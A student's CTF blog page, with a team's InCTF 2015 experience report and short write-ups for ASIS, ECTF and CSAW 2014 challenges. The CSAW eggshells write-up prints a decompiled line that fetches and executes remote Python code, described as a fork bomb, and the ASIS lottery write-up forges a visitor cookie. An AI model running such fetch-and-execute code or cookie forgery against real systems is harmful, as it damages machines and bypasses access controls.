CTF – Tummala Dhanvi's Blog

InCTF-2015 Experiences

Hello every one 😀

In this post I will be sharing my experiences on InCTF2015, I am writing this blog as the admins of the CTF have made it a question worth of 100 and the difference between us and the next team below us was just a matter of solving the question first (bonus score) any way I don’t think that there will be any bonus score for this question as I am not the first one to send my experiences and hope the VYkingS team didn’t send the experience first 😛

And also I wish that the awarding points will not be done as in the collage exams (based on the length of the answer written lol :P). One more thing this is not just my personal experiences, these represent the team (beginners) experiences (another way of saying other members in the team may or many not write their own :D, best way to skip the job)

Enough of this intro, to be frank InCTF is the only challenge which made me feel confident that, I can achieve something great 😀 words are not sufficient for me to describe about this CTF and I am not a writer too 😛 (doesn’t mean that this is the end of the post)

I have taken part in some ctf’s like PicoCTF but I have never participated in the live ctf and able to solve this many challenges and had a real feel of CTF and competition and thinking to win it and really won it 😀

So I will say how this ctf went on, first of all the day before the challenge I was given the task to submit the first round tasks by sending them a email. I was having holiday on friday as there were some cultural events so I slept a lot on the friday and in the night I started looking at the first round question and trying to complete them if there were any blanks and some missing things etc.. So I submitted them around 5 AM (as usual do the assignment on the last day in engineering :P). My team mate told that he will wake me up at 9 AM and thought to get ready by 10AM and start the competition. Thank God that on the friday something big happened in the Kerala and Saturday was declared as hartal (bund – In kerala you can expect them once in a week so lot of holidays for our college 😛 )

My friend Rakesh (rok_ in IRC) woke me up only at 10AM so that I can more sleep 😀 and then came to known that the ctf will be starting only at 12, I felt very happy as I need not start the ctf lately (as in the case of normal class and then ask faculty for attendance and attendance is very strict in Amrita :P) This definitely helps us as other wish we couldn’t have scored the bonus points which made the lead the CTF. So saw the India batting for some time and the wickets fell continuously so I stopped watching (you know these lucky things right :D) And then I started going to lab knowing everything regarding harthal is fine now (as the wifi at the hostel sucks as less as 50kbs which is far less than the 3g speed in my mobile)

Sai Ram (blah_blah) was already there in the lab waiting for the challenges to come online (he is our crypto expert) after that we had our food in mess (mess food really sucks here 🙁 ) and then our other members Rakesh and Abhishek(REVO in IRC) joined us.

So in this manner all the ctf started and the first thing that we targeted was triva as it’s the best way was to score the points easily. So we got hefty points (including bonus points) in the starting and we solved all the triva(including twitter picture the top image in the blog) except 2 question the ip one and the docx one.

I tried for the ip one as localhost as I know nothing more than that as I haven’t taken my network classes yet, then later I asked the same with admin, he told I was correct but there was some similar name to the localhost and always I found was loopback and then I gave a try with it and got the flag

We we stuck at the docx one till next day It was my mistake 🙁 after extracting the tar.gz file I got a zip file, instead of a second thought I just unzipped the file 🙁 this was my dam mistake and I was getting the answer by zipping the file again and renaming the file to docx and this didn’t work because the version of the zip in my machine was a latest one 🙁 , When the admins told that they have told that they have made the question easy for us, I got the flag in matter of just typing 😀 , Lesson learned if you are not getting a simple challenge try to start doing it again you might have done something wrong

My area is RE so I first about those problems, The first two sums were pretty easy and I got them as soon as opening them in the IDA pro. first one was a small ARM question and second one was hardcoded password strings will give the flag

And the third one was jar file, I have jad (java decompiler no need online one :D) and then decompiled them but I have never coded in java and all the problems I have done in picoctf were just hard coded ie the password was right there when I just decompiled them So I have postponed this one to next day ( I should have done it now it self as it was also very easy one)

I started doing the Forensics even thought, It was not a my piece of cake, the first one which I solve was fixme one in this question we were given a image file and It was damaged, as per my knowledge the thing that they would have done is just changed the header of the image, but I have never used any tools or hexedit to change it to match the exact header, but the online services have saved me from a lot of googling and installing new software 😛 and got the image fixed not sure which one worked for me but I will mention them in the write-up if I have time

Second one was pcap file and my friends found something interesting in the wireshark which say it’s the key (but it didn’t say that it is the flag :P) we have submitted many times the same key and even told admins that the question has some issue with it, later we came to know that we need to get a file from the pcap and this is the key to open the file. I have used a lot of tools in windows vm to get the files from the pcap file but nothing worked well (or my vm is bad) but I found a ausome tool for linux named foremost which gave me the zipped file in a matter of seconds and I used the key to unzip the flag and then got the flag 😀

I have tried many other sums but not sure if i can explain them here, few of the web question were solved by Abhishek (REVO) one was 9999 sum we need to give the hex value not sure about the second one

Rakesh (rok) was able to solve few binary not sure how he got them

By the night around 12 we got the score of 1500 and we have been in almost top 5 (not sure about it it might be top 10 too) so we did our best for the first day

So I and rakesh decided to take good rest so that we will be able to solve theres well tomorrow and Sai ram and abhishek decided to burn the midnight oil 😀

In the night on return we had a great opportunity to steal mangoes from one house on our way back to hostel (every day there used to be a dog and it was our lucky day that it wasn’t there or sleeping) we ate the first mango of this season even before ugadi (ugadi is festival of Andhra people)

And the best part was the hostel door was locked and only way we can enter is by jumping the wall (which is common for us don’t say it to our warden)

Next day I was in the lab by 9 AM (every one was surprised as I never got up that early on sundays and came to lab)

This day was not that successive in points (but we were moving close to our answers slowly) Our position went as bad as 20 but we were still first in our campus (so that we will be sure for the 3rd round)

But something worst happened to us we were overtaken by a girls(seniors) team from our campus who are participating in the ctf for the first time (no offence anonymous I suggest you choose a another team name as this name doesn’t have a good name in the security field)

But the lesson learned was never give up even thought every thing seems very difficult (as we can say from our results as we topped)

But when the hints were given we were able to slowly get the score in the ending and the mass hints very useful to us 😀

We will be trying to write writeups and explaining them very clearly and updating this post too

Any way we were able to solve all the RE and crypto (credits goes to Sai ram our crypto master re all except which were taken down)

here is the screen shot of the question solved In the last minute our target was just to make sure that our team will be first, the new opponent that we have is the IITR VKingS team which came equal to us (except for the bonus points) all our team members are working in the last minute to make sure that we score one more question and remain in our position. I and sai ram were working on forensics and Rakesh binary Abhishek Poodle question (If we were able to continue solving the same we would have been no where reachable to other team)

Any way the final score was like this

Now coming the final words (I have been told by admins the points for this question will be awarded based on the how well we appreciate the team and their work 😛 jk)

Over all the CTF was Excellent 😀

We appreciate all the people who are responsible for creating this great event

The greatest thing about this event is that this event was that this event was not at all run for profit and the motto of InCTF was to make more people from our country interested in Cyber Security and all the event organizers didn’t expect any thing in return other than our active participation (though they get some experience in conducting CTF’s :P)

Also Definitely InCTF2015 sponsors VMWARE definately as they are the main people sponsoring this event by bearing all the money for the servers and travel charges for the 3rd round etc … Think of the case if they weren’t there and each team has to pay 200 INR in the form of DD to Amrita University, the case would have been different

Fedora for make more girls team to participate

Mycodeschool for publicity (even though some team complain that publicity was not so good, hope they understand that the resources(money) are very less )

Not the least Amrita University Cyber Security Department (believe me I won’t get any extra credits for this 😛 )

Cons :- (Indian can complain about every thing even though every thing was perfectly good 😛 )

Rules were not clear for example the 3points bonus score I think it’s no where mentioned in the website even thought we figured it out very fastly

Also wish every question were named as in picoctf based on the question type not just bin1 bin2 so on, but clues made it clear, forensics question names were based on the type thought

Website is too old 😛 think it can go for a new design

That’s it 😀

Tummala Dhanvi (c0mrad3 black shirt in the behind main photo)

Sai Ram ( blah_blah white checks in the behind)

Abhishek (REVO man with spects red shirt selfe taker :P)

Rakesh (rok_ remaining one 😛 )

LOTTERY ASIS-CTF-2014 Web-100 writeup

This question it the basic of the web challenge if we go to the link given above we usually get a message like this when we visit the page for the first time 🙂

As the page says let’s visit the page for the second time 🙂

So here comes the lottery which says that we are 2444th visitor and we need to become the 1234567890th visitor to get the lottery also with the clue saying that don’t hack cookies. We should be always doing the thing that we are not supposed to do so let’s try hacking the cookies. But the first thing we need to do when we see a web question is to view the source page of the given question 🙂 but when you see the source page you will understand that there is no other way to find the visitor number except the cookie 🙂

If you not aware what a cookie is find about it http://en.wikipedia.org/wiki/HTTP_cookie

I have a cool tool which is called as “edit this cookie” to edit the cookies you can get it in the chrome store at https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en

if you look at the cookie named Visitor you will see a value like this which is url encoded

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA%3D%3D

for more details about it visit this wiki page of the URL encoding http://en.wikipedia.org/wiki/Percent-encoding

If you have doubt why we should use the URL encoding this link will give the answer to you http://stackoverflow.com/questions/4667942/why-should-i-use-urlencode

If you decode it using any tool, I use this online tool http://www.url-encode-decode.com/

The decoded result will be like this

MjQ1Njo3Y2Y2NDM3OWViNmYyOWE0ZDI1YzRiNmEyZGY3MTNlNA==

which again seems to be like a base64 encoding if you decode it the output looks like this

2456:7cf64379eb6f29a4d25c4b6a2df713e4

2456 seems our number which we visited so if we could change the number to 1234567890 we could win the lottery (get the flag 😀 )
The number after the 2456 is nothing but the md5sum of the number 2456 🙂

1234567890:e807f1fcf82d132f9bb018ca6738a19f

is the one we need to make the value of the cookie to base64

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg==

and finally we need to encode it with URL encoding which looks like

MTIzNDU2Nzg5MDplODA3ZjFmY2Y4MmQxMzJmOWJiMDE4Y2E2NzM4YTE5Zg%3D%3D

so if you submit the cookie and refresh the page you get the flag as

ASIS_9f1af649f25108144fc38a01f8767c0c

Here is the screenshot of the flag 🙂

HOW MUCH EXACTLY? ASIS-2014 Trivia-25 writeup

This is a very easy question as google was enough to get the key 🙂

If you google the description you will get the following link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

If you search for (Ctrl+F ————-> find) in the link for how much you will be knowing that all the references are taken from this link http://www.sims.berkelev.edu/research/proiects/how-much-%20info-2003/execsum.htm#summary

Unfortunately this web-page is not available now if you google for it you will get a link in www2 as http://www2.sims.berkeley.edu/research/projects/how-much-info-2003/execsum.htm

If you search for the IM (Instant messaging) you get it’s size is 274 Terabytes

The format of the flag is ASIS_md5(size)[which means that we need to find the md5sum of size and append “ASIS_” to it. Which results in the following flag. we can find the md5sum of any value in the terminal using the following command

echo -n 274 | md5sum

The -n flag is to mention echo no to give the newline, as echo by default gives the newline “n” as the newline at the endof 274 changes the md5 sum so we should not forget it 🙂

ASIS_d947bf06a885db0d477d707121934ff8

But later I found that the size of the instant messaging was directly in the link https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt

I should have searched for instant messaging in the text file directly which I have later learned from other write-up

T_1000 ECTF Recon-120 writeup

This is the toughest recon that I have ever seen (or in other words the worst one :P)

First result that you find when you search for T_1000 is the terminator so I tried all the names related to the movie such as the director, the producer, the actor who acted as the T_1000 but no result 🙁 I have also tried skynet which is considered to make the terminator in the film 😛 my team mate was kidding saying to enter the flag as Rajinikanth 😀

After asking admins about the challenge, I have concluded that T_1000 was not related to movies 🙂

My team mate solved the forensics-500 which relates to the channel #nitk-maliciousbots which contain the bot named T_1000 , so I thought this was end of the recon so I tried to get the flag by asking the bot in private message, but this was only the half of the challenge 🙂

Again from the clue whois T_1000, the output of the whois command in irc is as follows

@31337_h4X0R (cinch@2a01:7e00::f03c:91ff:fe56:df09)

BOT_T_1000 is connected via holmes.freenode.net (London, UK)

Operator in:

#nitk-maliciousbots

so we got a new thing to google for 🙂 ie.. 31337_h4X0R, it seems that 31337_h4X0R has a twitter account here is the account https://twitter.com/31337_h4X0R

This account has very few tweets and it contain this photo

And finally if you grep for the strings in the photo we get the flag as follows

flag{I_am_N0t_Ge0Hot}

Eight Cats Hid The Flag ECTF 2014 Recon 100 writeup

From the question and the clue given we can surely say that the flag is in one of the github of the admin’s.

First I have got the idea of downloading all the files and grep them for the flag (this method did not work because the flag was deleted, so you can’t find the flag in any of the repositories )

I tried manually checking all the commits of the admin’s but I didn’t succeeded bcoz the commit was very old like a month old, I didn’t go that deeper into the commits 🙁

here is link of the commit in which the flag was deleted https://github.com/karthiksenthil/Learn-Git/commit/9cd4ecad6f7c545ef5ac31622d503de811191d7b
flag{0ctocat_c4n_play_h1de_and_s33k}

Meet The Team – Ectf 2014 Recon-80

I have attached the screen-shot of the question 🙂 of Recon-80

The question is very simple but getting the blog of the team becomes hard because ECTF is organised for the first time.

The ECTF organizers doesn’t have a good blog which contains all the write up’s that they have solved, it seems like they have created blog just for the case of the challenge as the blog contains only one post which makes it difficult for the search engines to get the get that link (if any of you googled for the blog and did not get the link don’t blame google as it is doing a great job)

The name of team which is organising the ctf is NIA (no internet access). They have mentioned it in the clue also but you will never get to know that it is the name of the team for more details visit this link http://nia-ctf.github.io/

Bingo you got the blog link in the ctftime.org at this address https://ctftime.org/team/8096 and you get the link as http://nia-ctf.github.io/ so you got the flag, there was some small confusion regarding the format of the flag but the admin would have helped you at that time 🙂

flag:http://nia-ctf.github.io/

CSAW CTF Quals 2014 – eggshells (100) writeup

Here is the link of the zip file and the question http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/

The question is :

I trust people on the internet all the time, do you?

Written by ColdHeat

The question doesn’t give you any kind of hint when you first try to solve it but when you finally see the result it makes some sense to you 🙂

First when you unzip the file you get two directories named as “eggshells-master” and “__MACOSX” here are the screenshots of the directories of the both the folders.

The source code of all other files except the utilys.pyc file which is a python compiled file you can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/ ) which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2) or what ever which can decompile python 2.7 file 🙂

If you decompile the file here is the code that you get:

[code language=”python”]
exec __import__(‘urllib2’).urlopen(‘http://kchung.co/lol.py’).read()
[/code]

Don’t be in a hurry and just run the code as it is a fork bomb 🙂

here you get the flag : flag{trust_is_risky}

Now you get why the question is like that 🙂

CSAW CTF 2014

I have participated in my first ctf csaw 2014. Even though I could not solve a good amount of questions.

Here is the link of the website https://ctf.isis.poly.edu/. There is a good archive of the problems in the shell-storm website here is the link http://shell-storm.org/repo/CTF/CSAW-2014/.

You can expect me to writing the writeups for the questions specifically reverse engineering